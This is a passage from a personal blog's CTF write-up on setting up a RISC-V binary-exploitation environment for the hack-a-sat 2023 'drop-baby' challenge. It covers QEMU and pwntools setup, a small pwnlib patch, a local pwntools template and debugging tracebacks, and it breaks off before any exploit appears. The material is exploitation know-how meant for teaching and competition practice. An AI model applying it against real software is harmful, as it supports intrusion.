<!doctype html><html lang=en><head><meta name=viewport content="width=device-width"><meta charset=utf-8><meta http-equiv=X-UA-Compatible content="IE=7"><link rel=icon href=/cyberpunk-cat32x32.png><link rel="shortcut icon" href=/cyberpunk-cat32x32.ico type=image/x-icon><link rel=apple-touch-icon href=/cyberpunk-cat180x180.png><title>ROPing on RISC-V - hack-a-sat23 &ndash;
Nikolaos Chalkiadakis
</title><link href=/symbols-nerd-font/symbols-nerd-font.css rel=stylesheet integrity="sha512-lydow8GLOLlYNOtHlksNCmGWWCBsbIEtikXpHzfWqx78HLlyQZHOzyLwPpKol4Th6aCwLUXOfODVYgwrd3nwKQ=="><link href=/jetbrains-mono/jetbrains-mono.css rel=stylesheet integrity="sha512-tJxlgL6v1Y7kFf+qB8SloaAMKnOAw6WouknxXtIjkBux9Y/9aX81EUWOJO8c/3l98DmjG8brr4to7zaez606Fg=="><link type=text/css rel=stylesheet href=https://chalkiadakis.me/css/styles.78454e95bc3bb7af4e371fd1e897fd1c4968c37e56603d2b366f4d9a8658e4299369f4de03647cf0e68420ad45571fa6f27c00e694f28e7b83274e512e314f00.css integrity="sha512-eEVOlbw7t69ONx/R6Jf9HElow35WYD0rNm9NmoZY5CmTafTeA2R88OaEIK1FVx+m8nwA5pTyjnuDJ05RLjFPAA=="><script type=text/javascript src=/fontawesome/all.min.js></script><meta name=author content="Nikolaos Chalkiadakis"><meta name=keywords content="ctf,environment setup,hack-a-sat,pwn,RISC-V"><meta name=description content="s environment for RISC-V using QEMU and chaining ROP gadgets."><meta property="og:site_name" content="Nikolaos Chalkiadakis"><meta property="og:title" content="ROPing on RISC-V - hack-a-sat23"><meta property="og:type" content="article"><meta property="article:author" content="Nikolaos Chalkiadakis"><meta property="article:published_time" content="2023-05-05T00:00:01Z+0000"><meta property="article:tag" content="ctf"><meta property="article:tag" content="environment setup"><meta property="article:tag" content="hack-a-sat"><meta property="article:tag" content="pwn"><meta property="article:tag" content="RISC-V"><meta property="og:url" content="https://chalkiadakis.me/posts/hack-a-sat-23/riscv-pwn/"><meta property="og:image" content="https://chalkiadakis.me/post-resources/riscv-pwn/risc-v.png"><meta property="og:description" content="Setting up a pwntools environment for RISC-V using QEMU and chaining ROP gadgets."><meta name=twitter:card content="summary_large_image"><meta property="twitter:domain" content="chalkiadakis.me"><meta property="twitter:url" content="https://chalkiadakis.me/posts/hack-a-sat-23/riscv-pwn/"><meta name=twitter:title content="ROPing on RISC-V - hack-a-sat23"><meta name=twitter:image content="https://chalkiadakis.me/post-resources/riscv-pwn/risc-v.png"><meta name=twitter:description content="Setting up a pwntools environment for RISC-V using QEMU and chaining ROP gadgets."><link rel=manifest href=/manifest/index.json></head><body><div id=baseContainer><header><div class=titleAndSearchContainer><div id=titleContainer><a class=unstyledLink href=/><img src=/cyberpunk-cat512x512.png alt=Logo></a><div class=rightOfLogo><div class=titleAndHamburger><h1><a class=unstyledLink href=/>Nikolaos Chalkiadakis</a></h1></div><div id=wide_nav><nav><ul id=main-nav><li><a href=/>Home</a></li><li><a href=/posts>Posts</a></li><li><a href=/whoami/>whoami</a></li><li><a href=/tags>Tags</a></li></ul></nav></div></div></div><div class=search><input id=searchbar type=text placeholder=Search>
<a class=nerdlink onclick=newSearch()>&#xf002;</a></div><script>function newSearch(){let e=searchbar.value.trim();if(!e)return;location.href=`/search?q=${e}`}searchbar.onkeyup=e=>{e.keyCode==13&&newSearch()}</script></div><div id=links><a rel=noreferrer target=_blank class=nerdlink href=https://github.com/nikosChalk>&#xf09b;
<span>GitHub
</span></a><a rel=noreferrer target=_blank class=nerdlink href=https://www.linkedin.com/in/chalkn>&#xf0e1;
<span>LinkedIn
</span></a><a rel=noreferrer target=_blank class=nerdlink href=https://ctftime.org/user/128082><img src=/ctf-timefavicon.png width=14px>
<span>CTFTime</span></a></div></header><div id=contentContainer><div id=content><main><article class="card single"><h1>ROPing on RISC-V - hack-a-sat23</h1><p class=date><span title=Date> </span>2023, May 5</p><div class=articleToc style=display:flex><div><nav id=TableOfContents><ul><li><a href=#setting-up-an-environment>Setting up an environment</a><ul><li><a href=#vanilla-environment>Vanilla environment</a></li><li><a href=#pwntools-environment>pwntools environment</a></li></ul></li><li><a href=#source-code>Source code</a></li><li><a href=#detour-to-risc-v-architecture-and-abi>Detour to RISC-V architecture and ABI</a><ul><li><a href=#registers>Registers</a></li><li><a href=#datatypes>Datatypes</a></li><li><a href=#function-call-convention>Function call convention</a></li><li><a href=#other>Other</a></li></ul></li><li><a href=#pwning>Pwning</a></li></ul></nav></div><div style=flex:1><figure style=margin:0><img src=/post-resources/riscv-pwn/risc-v.png alt></figure></div></div><hr><div><p>This post is about creating a pwn environment for RISC-V, exploiting RISC-V binaries, and doing ROP chains on RISC-V. We will use as our target binary to pwn, the <a href=https://github.com/nikosChalk/ctf-writeups/raw/master/hack-a-sat-23/pwn/dROP-Baby/src/drop-baby target=_blank rel="noopener noreferrer"><code>drop-baby</code></a> binary from hack-a-sat CTF 2023.</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>nikos@ctf-box:~$ file drop-baby
</span></span><span style=display:flex><span>drop-baby: ELF 32-bit LSB executable, UCB RISC-V, version <span style=color:#ae81ff>1</span> <span style=color:#f92672>(</span>SYSV<span style=color:#f92672>)</span>, statically linked, <span style=color:#66d9ef>for</span> GNU/Linux 5.4.0, with debug_info, not stripped
</span></span></code></pre></div><h2 id=setting-up-an-environment>Setting up an environment</h2><p>Before we can begin diving into exploitation, we need to set up our RISC-V pwning environment.</p><p>We will use <a href=https://www.qemu.org/ target=_blank rel="noopener noreferrer">QEMU</a> to emulate the binary, <a href=https://docs.kernel.org/admin-guide/binfmt-misc.html target=_blank rel="noopener noreferrer">binfmt</a> for seamless interaction with the binary, <code>gdb-multiarch</code> to debug it, <a href=https://github.com/Gallopsled/pwntools target=_blank rel="noopener noreferrer">pwntools</a> to programmatically interact with it and write our exploit script, <code>binutils-riscv64-linux-gnu</code> for generating shellcode (assembler), and <a href=https://github.com/JonathanSalwan/ROPgadget target=_blank rel="noopener noreferrer">ROPgadget</a> to find ROP gadgets in RISC-V binaries. Since this is cutting edge stuff, it is always recommended to run on the latest version.</p><h3 id=vanilla-environment>Vanilla environment</h3><p>Let&rsquo;s start with the vanilla environment, so QEMU, binfmt, binutils, and GDB:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>sudo apt update
</span></span><span style=display:flex><span>sudo apt-get install -y <span style=color:#ae81ff>\
</span></span></span><span style=display:flex><span><span style=color:#ae81ff></span>    binutils-riscv64-linux-gnu binutils-doc <span style=color:#ae81ff>\
</span></span></span><span style=display:flex><span><span style=color:#ae81ff></span>    binfmt-support <span style=color:#ae81ff>\
</span></span></span><span style=display:flex><span><span style=color:#ae81ff></span>    qemu qemu-utils <span style=color:#ae81ff>\
</span></span></span><span style=display:flex><span><span style=color:#ae81ff></span>    qemu-user qemu-user-static <span style=color:#ae81ff>\
</span></span></span><span style=display:flex><span><span style=color:#ae81ff></span>    qemu-system qemu-system-misc <span style=color:#ae81ff>\
</span></span></span><span style=display:flex><span><span style=color:#ae81ff></span>    gdb-multiarch
</span></span><span style=display:flex><span>sudo apt-get install gcc-riscv64-linux-gnu <span style=color:#75715e># optional. For using gcc to produce risc-v 64-bit binaries.</span>
</span></span><span style=display:flex><span>pip install --upgrade pwntools ROPgadget
</span></span></code></pre></div><p>If everything has been done installed correctly, you should now have entries registered in <code>binfmt</code> about RISC-V:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>nikos@ctf-box:~$ update-binfmts --display
</span></span><span style=display:flex><span>qemu-riscv32 <span style=color:#f92672>(</span>enabled<span style=color:#f92672>)</span>:
</span></span><span style=display:flex><span>     package <span style=color:#f92672>=</span> qemu-user-static
</span></span><span style=display:flex><span>        type <span style=color:#f92672>=</span> magic
</span></span><span style=display:flex><span>      offset <span style=color:#f92672>=</span> <span style=color:#ae81ff>0</span>
</span></span><span style=display:flex><span>       magic <span style=color:#f92672>=</span> <span style=color:#ae81ff>\x</span>7f<span style=color:#ae81ff>\x</span>45<span style=color:#ae81ff>\x</span>4c<span style=color:#ae81ff>\x</span>46<span style=color:#ae81ff>\x</span>01<span style=color:#ae81ff>\x</span>01<span style=color:#ae81ff>\x</span>01<span style=color:#ae81ff>\x</span>00<span style=color:#ae81ff>\x</span>00<span style=color:#ae81ff>\x</span>00<span style=color:#ae81ff>\x</span>00<span style=color:#ae81ff>\x</span>00<span style=color:#ae81ff>\x</span>00<span style=color:#ae81ff>\x</span>00<span style=color:#ae81ff>\x</span>00<span style=color:#ae81ff>\x</span>00<span style=color:#ae81ff>\x</span>02<span style=color:#ae81ff>\x</span>00<span style=color:#ae81ff>\x</span>f3<span style=color:#ae81ff>\x</span><span style=color:#ae81ff>00</span>
</span></span><span style=display:flex><span>        mask <span style=color:#f92672>=</span> <span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>00<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>fe<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff
</span></span><span style=display:flex><span> interpreter <span style=color:#f92672>=</span> /usr/libexec/qemu-binfmt/riscv32-binfmt-P
</span></span><span style=display:flex><span>    detector <span style=color:#f92672>=</span>
</span></span><span style=display:flex><span>qemu-riscv64 <span style=color:#f92672>(</span>enabled<span style=color:#f92672>)</span>:
</span></span><span style=display:flex><span>     package <span style=color:#f92672>=</span> qemu-user-static
</span></span><span style=display:flex><span>        type <span style=color:#f92672>=</span> magic
</span></span><span style=display:flex><span>      offset <span style=color:#f92672>=</span> <span style=color:#ae81ff>0</span>
</span></span><span style=display:flex><span>       magic <span style=color:#f92672>=</span> <span style=color:#ae81ff>\x</span>7f<span style=color:#ae81ff>\x</span>45<span style=color:#ae81ff>\x</span>4c<span style=color:#ae81ff>\x</span>46<span style=color:#ae81ff>\x</span>02<span style=color:#ae81ff>\x</span>01<span style=color:#ae81ff>\x</span>01<span style=color:#ae81ff>\x</span>00<span style=color:#ae81ff>\x</span>00<span style=color:#ae81ff>\x</span>00<span style=color:#ae81ff>\x</span>00<span style=color:#ae81ff>\x</span>00<span style=color:#ae81ff>\x</span>00<span style=color:#ae81ff>\x</span>00<span style=color:#ae81ff>\x</span>00<span style=color:#ae81ff>\x</span>00<span style=color:#ae81ff>\x</span>02<span style=color:#ae81ff>\x</span>00<span style=color:#ae81ff>\x</span>f3<span style=color:#ae81ff>\x</span><span style=color:#ae81ff>00</span>
</span></span><span style=display:flex><span>        mask <span style=color:#f92672>=</span> <span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>00<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>fe<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff<span style=color:#ae81ff>\x</span>ff
</span></span><span style=display:flex><span> interpreter <span style=color:#f92672>=</span> /usr/libexec/qemu-binfmt/riscv64-binfmt-P
</span></span><span style=display:flex><span>    detector <span style=color:#f92672>=</span>
</span></span></code></pre></div><p>And you should also be able to simply run the binary:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>nikos@ctf-box:~$ file drop-baby
</span></span><span style=display:flex><span>drop-baby: ELF 32-bit LSB executable, UCB RISC-V, RVC, double-float ABI, version <span style=color:#ae81ff>1</span> <span style=color:#f92672>(</span>SYSV<span style=color:#f92672>)</span>, statically linked, <span style=color:#66d9ef>for</span> GNU/Linux 5.4.0, with debug_info, not stripped
</span></span><span style=display:flex><span>nikos@ctf-box:~$ ./drop-baby
</span></span><span style=display:flex><span>No flag present
</span></span></code></pre></div><p>You should also be able to run the binary under <code>gdb-multiarch</code>:</p><p><img src=/post-resources/riscv-pwn/gdb-multiarch.png alt=gdb-multiarch></p><p>Great!</p><h3 id=pwntools-environment>pwntools environment</h3><p>Now, let&rsquo;s make sure that pwntools with gdb also works (by default, in version &lt;4.9.0, they won&rsquo;t). Let&rsquo;s make a template pwntools and run it:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-python data-lang=python><span style=display:flex><span><span style=color:#75715e># minimal-template.py</span>
</span></span><span style=display:flex><span><span style=color:#75715e># A minimal custom template for binary exploitation that uses pwntools.</span>
</span></span><span style=display:flex><span><span style=color:#75715e># Run:</span>
</span></span><span style=display:flex><span><span style=color:#75715e>#   python minimal-template.py [DEBUG] [GDB]</span>
</span></span><span style=display:flex><span><span style=color:#f92672>from</span> pwn <span style=color:#f92672>import</span> <span style=color:#f92672>*</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#75715e># Set up pwntools for the correct architecture. See `context.binary/arch/bits/endianness` for more</span>
</span></span><span style=display:flex><span>context<span style=color:#f92672>.</span>binary <span style=color:#f92672>=</span> elfexe <span style=color:#f92672>=</span> ELF(<span style=color:#e6db74>&#39;./drop-baby&#39;</span>)
</span></span><span style=display:flex><span>print(context)
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#66d9ef>def</span> <span style=color:#a6e22e>start</span>(argv<span style=color:#f92672>=</span>[], <span style=color:#f92672>*</span>a, <span style=color:#f92672>**</span>kw):
</span></span><span style=display:flex><span>    <span style=color:#e6db74>&#39;&#39;&#39;Start the exploit against the target.&#39;&#39;&#39;</span>
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>if</span> args<span style=color:#f92672>.</span>GDB:
</span></span><span style=display:flex><span>        <span style=color:#66d9ef>return</span> gdb<span style=color:#f92672>.</span>debug([elfexe<span style=color:#f92672>.</span>path] <span style=color:#f92672>+</span> argv, gdbscript, elfexe<span style=color:#f92672>.</span>path, <span style=color:#f92672>*</span>a, <span style=color:#f92672>*</span>kw)
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>else</span>:
</span></span><span style=display:flex><span>        target <span style=color:#f92672>=</span> process([elfexe<span style=color:#f92672>.</span>path] <span style=color:#f92672>+</span> argv, <span style=color:#f92672>*</span>a, <span style=color:#f92672>**</span>kw)
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>return</span> target
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span><span style=color:#75715e># Specify your gdb script here for debugging. gdb will be launched the GDB argument is given.</span>
</span></span><span style=display:flex><span>gdbscript <span style=color:#f92672>=</span> <span style=color:#e6db74>&#39;&#39;&#39;
</span></span></span><span style=display:flex><span><span style=color:#e6db74># init-gef
</span></span></span><span style=display:flex><span><span style=color:#e6db74># continue
</span></span></span><span style=display:flex><span><span style=color:#e6db74>&#39;&#39;&#39;</span><span style=color:#f92672>.</span>format(<span style=color:#f92672>**</span>locals())
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>arguments <span style=color:#f92672>=</span> []
</span></span><span style=display:flex><span>io <span style=color:#f92672>=</span> start(arguments)
</span></span><span style=display:flex><span>io<span style=color:#f92672>.</span>interactive()
</span></span><span style=display:flex><span>io<span style=color:#f92672>.</span>close()
</span></span></code></pre></div><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>nikos@ctf-box:~$ python minimal-template.py
</span></span><span style=display:flex><span><span style=color:#f92672>[</span>*<span style=color:#f92672>]</span> <span style=color:#e6db74>&#39;~/drop-baby&#39;</span>
</span></span><span style=display:flex><span>    Arch:     riscv-32-little
</span></span><span style=display:flex><span>    RELRO:    Partial RELRO
</span></span><span style=display:flex><span>    Stack:    No canary found
</span></span><span style=display:flex><span>    NX:       NX enabled
</span></span><span style=display:flex><span>    PIE:      No PIE <span style=color:#f92672>(</span>0x10000<span style=color:#f92672>)</span>
</span></span><span style=display:flex><span>Traceback <span style=color:#f92672>(</span>most recent call last<span style=color:#f92672>)</span>:
</span></span><span style=display:flex><span>  File <span style=color:#e6db74>&#34;~/.pyenv/versions/3.10.5/lib/python3.10/site-packages/pwnlib/context/__init__.py&#34;</span>, line 785, in arch
</span></span><span style=display:flex><span>    defaults <span style=color:#f92672>=</span> self.architectures<span style=color:#f92672>[</span>arch<span style=color:#f92672>]</span>
</span></span><span style=display:flex><span>KeyError: <span style=color:#e6db74>&#39;em_riscv&#39;</span>
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>During handling of the above exception, another exception occurred:
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>Traceback <span style=color:#f92672>(</span>most recent call last<span style=color:#f92672>)</span>:
</span></span><span style=display:flex><span>  File <span style=color:#e6db74>&#34;~/minimal-template.py&#34;</span>, line 8, in &lt;module&gt;
</span></span><span style=display:flex><span>    context.binary <span style=color:#f92672>=</span> elfexe <span style=color:#f92672>=</span> ELF<span style=color:#f92672>(</span><span style=color:#e6db74>&#39;./drop-baby&#39;</span><span style=color:#f92672>)</span>
</span></span><span style=display:flex><span>  File <span style=color:#e6db74>&#34;~/.pyenv/versions/3.10.5/lib/python3.10/site-packages/pwnlib/context/__init__.py&#34;</span>, line 176, in fset
</span></span><span style=display:flex><span>    self._tls<span style=color:#f92672>[</span>name<span style=color:#f92672>]</span> <span style=color:#f92672>=</span> validator<span style=color:#f92672>(</span>self, val<span style=color:#f92672>)</span>
</span></span><span style=display:flex><span>  File <span style=color:#e6db74>&#34;~/.pyenv/versions/3.10.5/lib/python3.10/site-packages/pwnlib/context/__init__.py&#34;</span>, line 872, in binary
</span></span><span style=display:flex><span>    self.arch   <span style=color:#f92672>=</span> binary.arch
</span></span><span style=display:flex><span>  File <span style=color:#e6db74>&#34;~/.pyenv/versions/3.10.5/lib/python3.10/site-packages/pwnlib/context/__init__.py&#34;</span>, line 176, in fset
</span></span><span style=display:flex><span>    self._tls<span style=color:#f92672>[</span>name<span style=color:#f92672>]</span> <span style=color:#f92672>=</span> validator<span style=color:#f92672>(</span>self, val<span style=color:#f92672>)</span>
</span></span><span style=display:flex><span>  File <span style=color:#e6db74>&#34;~/.pyenv/versions/3.10.5/lib/python3.10/site-packages/pwnlib/context/__init__.py&#34;</span>, line 787, in arch
</span></span><span style=display:flex><span>    raise AttributeError<span style=color:#f92672>(</span><span style=color:#e6db74>&#39;AttributeError: arch must be one of %r&#39;</span> % sorted<span style=color:#f92672>(</span>self.architectures<span style=color:#f92672>))</span>
</span></span><span style=display:flex><span>AttributeError: AttributeError: arch must be one of <span style=color:#f92672>[</span><span style=color:#e6db74>&#39;aarch64&#39;</span>, <span style=color:#e6db74>&#39;alpha&#39;</span>, <span style=color:#e6db74>&#39;amd64&#39;</span>, <span style=color:#e6db74>&#39;arm&#39;</span>, <span style=color:#e6db74>&#39;avr&#39;</span>, <span style=color:#e6db74>&#39;cris&#39;</span>, <span style=color:#e6db74>&#39;i386&#39;</span>, <span style=color:#e6db74>&#39;ia64&#39;</span>, <span style=color:#e6db74>&#39;m68k&#39;</span>, <span style=color:#e6db74>&#39;mips&#39;</span>, <span style=color:#e6db74>&#39;mips64&#39;</span>, <span style=color:#e6db74>&#39;msp430&#39;</span>, <span style=color:#e6db74>&#39;none&#39;</span>, <span style=color:#e6db74>&#39;powerpc&#39;</span>, <span style=color:#e6db74>&#39;powerpc64&#39;</span>, <span style=color:#e6db74>&#39;riscv&#39;</span>, <span style=color:#e6db74>&#39;s390&#39;</span>, <span style=color:#e6db74>&#39;sparc&#39;</span>, <span style=color:#e6db74>&#39;sparc64&#39;</span>, <span style=color:#e6db74>&#39;thumb&#39;</span>, <span style=color:#e6db74>&#39;vax&#39;</span><span style=color:#f92672>]</span>
</span></span></code></pre></div><p>Hmm interesting. It seems that the <code>pwnlib</code> library knows about <code>'riscv'</code> architecture but not about <code>'em_riscv'</code> (upstream issue <a href=https://github.com/Gallopsled/pwntools/pull/2177 target=_blank rel="noopener noreferrer">here</a>). Anyway, we know already that our system can run the binary so let&rsquo;s add a small patch to the <code>~/.pyenv/versions/3.10.5/lib/python3.10/site-packages/pwnlib/elf/elf.py</code> file of the <code>pwnlib</code> library.</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-diff data-lang=diff><span style=display:flex><span>diff --git a/elf.py b/elf.py
</span></span><span style=display:flex><span>index c6e6708..7f89bd8 100644
</span></span><span style=display:flex><span><span style=color:#f92672>--- a/elf.py
</span></span></span><span style=display:flex><span><span style=color:#f92672></span><span style=color:#a6e22e>+++ b/elf.py
</span></span></span><span style=display:flex><span><span style=color:#a6e22e></span><span style=color:#75715e>@@ -481,7 +481,8 @@ class ELF(ELFFile):
</span></span></span><span style=display:flex><span><span style=color:#75715e></span>             &#39;EM_PPC64&#39;: &#39;powerpc64&#39;,
</span></span><span style=display:flex><span>             &#39;EM_SPARC32PLUS&#39;: &#39;sparc&#39;,
</span></span><span style=display:flex><span>             &#39;EM_SPARCV9&#39;: &#39;sparc64&#39;,
</span></span><span style=display:flex><span><span style=color:#f92672>-            &#39;EM_IA_64&#39;: &#39;ia64&#39;
</span></span></span><span style=display:flex><span><span style=color:#f92672></span><span style=color:#a6e22e>+            &#39;EM_IA_64&#39;: &#39;ia64&#39;,
</span></span></span><span style=display:flex><span><span style=color:#a6e22e>+            &#39;EM_RISCV&#39;: &#39;riscv&#39;
</span></span></span><span style=display:flex><span><span style=color:#a6e22e></span>         }.get(self[&#39;e_machine&#39;], self[&#39;e_machine&#39;])
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>     @property
</span></span></code></pre></div><p>Let&rsquo;s try running it again now:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>nikos@ctf-box:~$ python minimal-template.py
</span></span><span style=display:flex><span><span style=color:#f92672>[</span>*<span style=color:#f92672>]</span> <span style=color:#e6db74>&#39;~/drop-baby&#39;</span>
</span></span><span style=display:flex><span>    Arch:     riscv-32-little
</span></span><span style=display:flex><span>    RELRO:    Partial RELRO
</span></span><span style=display:flex><span>    Stack:    No canary found
</span></span><span style=display:flex><span>    NX:       NX enabled
</span></span><span style=display:flex><span>    PIE:      No PIE <span style=color:#f92672>(</span>0x10000<span style=color:#f92672>)</span>
</span></span><span style=display:flex><span>ContextType<span style=color:#f92672>(</span>arch <span style=color:#f92672>=</span> <span style=color:#e6db74>&#39;riscv&#39;</span>, binary <span style=color:#f92672>=</span> ELF<span style=color:#f92672>(</span><span style=color:#e6db74>&#39;~/drop-baby&#39;</span><span style=color:#f92672>)</span>, bits <span style=color:#f92672>=</span> 32, endian <span style=color:#f92672>=</span> <span style=color:#e6db74>&#39;little&#39;</span>, os <span style=color:#f92672>=</span> <span style=color:#e6db74>&#39;linux&#39;</span><span style=color:#f92672>)</span>
</span></span><span style=display:flex><span><span style=color:#f92672>[</span>+<span style=color:#f92672>]</span> Starting local process <span style=color:#e6db74>&#39;~/drop-baby&#39;</span>: pid <span style=color:#ae81ff>5541</span>
</span></span><span style=display:flex><span><span style=color:#f92672>[</span>*<span style=color:#f92672>]</span> Switching to interactive mode
</span></span><span style=display:flex><span>No flag present
</span></span><span style=display:flex><span><span style=color:#f92672>[</span>*<span style=color:#f92672>]</span> Got EOF <span style=color:#66d9ef>while</span> reading in interactive
</span></span><span style=display:flex><span>$
</span></span><span style=display:flex><span><span style=color:#f92672>[</span>*<span style=color:#f92672>]</span> Process <span style=color:#e6db74>&#39;~/drop-baby&#39;</span> stopped with exit code <span style=color:#ae81ff>255</span> <span style=color:#f92672>(</span>pid 5541<span style=color:#f92672>)</span>
</span></span><span style=display:flex><span><span style=color:#f92672>[</span>*<span style=color:#f92672>]</span> Got EOF <span style=color:#66d9ef>while</span> sending in interactive
</span></span></code></pre></div><p>Great! The binary works with pwntools. Let&rsquo;s try pwntools+gdb now:</p><div class=highlight><pre tabindex=0 style=color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span>nikos@ctf-box:~$ python minimal-template.py GDB
</span></span><span style=display:flex><span><span style=color:#f92672>[</span>*<span style=color:#f92672>]</span> <span style=color:#e6db74>&#39;~/drop-baby&#39;</span>
</span></span><span style=display:flex><span>    Arch:     riscv-32-little
</span></span><span style=display:flex><span>    RELRO:    Partial RELRO
</span></span><span style=display:flex><span>    Stack:    No canary found
</span></span><span style=display:flex><span>    NX:       NX enabled
</span></span><span style=display:flex><span>    PIE:      No PIE <span style=color:#f92672>(</span>0x10000<span style=color:#f92672>)</span>
</span></span><span style=display:flex><span>ContextType<span style=color:#f92672>(</span>arch <span style=color:#f92672>=</span> <span style=color:#e6db74>&#39;riscv&#39;</span>, binary <span style=color:#f92672>=</span> ELF<span style=color:#f92672>(</span><span style=color:#e6db74>&#39;~/drop-baby&#39;</span><span style=color:#f92672>)</span>, bits <span style=color:#f92672>=</span> 32, endian <span style=color:#f92672>=</span> <span style=color:#e6db74>&#39;little&#39;</span>, os <span style=color:#f92672>=</span> <span style=color:#e6db74>&#39;linux&#39;</span><span style=color:#f92672>)</span>
</span></span><span style=display:flex><span><span style=color:#f92672>[</span>!<span style=color:#f92672>]</span> Neither <span style=color:#e6db74>&#39;qemu-riscv&#39;</span> nor <span style=color:#e6db74>&#39;qemu-riscv-static&#39;</span> are available
</span></span><span style=display:flex><span><span style=color:#f92672>[</span>ERROR<span style=color:#f92672>]</span> argv must be strings or bytes: <span style=color:#f92672>[</span>None, <span style=color:#e6db74>&#39;--help&#39;</span><span style=color:#f92672>]</span>
</span></span><span style=display:flex><span>Traceback <span style=color:#f92672>(</span>most recent call last<span style=color:#f92672>)</span>:
</span></span><span style=display:flex><span>  File <span style=color:#e6db74>&#34;~/minimal-template.py&#34;</span>, line 26, in &lt;module&gt;
</span></span><span style=display:flex><span>    io <span style=color:#f92672>=</span> start<span style=color:#f92672>(</span>arguments<span style=color:#f92672>)</span>
</span></span><span style=display:flex><span>  File <span style=color:#e6db74>&#34;~/minimal-template.py&#34;</span>, line 14, in start
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>return</span> gdb.debug<span style=color:#f92672>([</span>elfexe.path<span style=color:#f92672>]</span> + argv, gdbscript, elfexe.path, *a, *kw<span style=color:#f92672>)</span>
</span></span><span style=display:flex><span>  File <span style=color:#e6db74>&#34;~/.pyenv/versions/3.10.5/lib/python3.10/site-packages/pwnlib/context/__init__.py&#34;</span>, line 1578, in setter
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>return</span> <span style=color:#66d9ef>function</span><span style=color:#f92672>(</span>*a, **kw<span style=color:#f92672>)</span>
</span></span><span style=display:flex><span>  File <span style=color:#e6db74>&#34;~/.pyenv/versions/3.10.5/lib/python3.10/site-packages/pwnlib/gdb.py&#34;</span>, line 539, in debug
</span></span><span style=display:flex><span>    sysroot <span style=color:#f92672>=</span> sysroot or qemu.ld_prefix<span style=color:#f92672>(</span>env<span style=color:#f92672>=</span>env<span style=color:#f92672>)</span>
</span></span><span style=display:flex><span>  File <span style=color:#e6db74>&#34;~/.pyenv/versions/3.10.5/lib/python3.10/site-packages/pwnlib/context/__init__.py&#34;</span>, line 1578, in setter
</span></span><span style=display:flex><span>    <span style=color:#66d9ef>return</span> <span style=color:#66d9ef>function</span><span style=color:#f92672>(</span>*a, **kw<span style=color:#f92672>)</span>
</span></span><span style=display:flex><span>  File <span style=color:#e6db74>&#34;~/.pyenv/versions/3.10.5/lib/python3.10/site-packages/pwnlib/qemu.py&#34;</span>, line 162, in ld_prefix
</span></span><span style=display:flex><span>    with process<span style=color:#f92672>([</span>path, <span style=color:#e6db74>&#39;--help&#39;</span><span style=color:#f92672>]</span>, env<span style=color:#f92672>=</span>env<span style=color:#f92672>)</span> as io:
</span></span><span style=display:flex><span>  File <span style=color:#e6db74>&#34;~/.pyenv/versions/3.10.5/lib/python3.10/site-packages/pwnlib/tubes/process.py&#34;</span>, line 258, in __init__
</span></span><span style=display:flex><span>    executable_val, argv_val, env_val <span style=color:#f92672>=</span> self._validate<span style=color:#f92672>(</span>cwd, executable, argv, env<span style=color:#f92672>)</span>
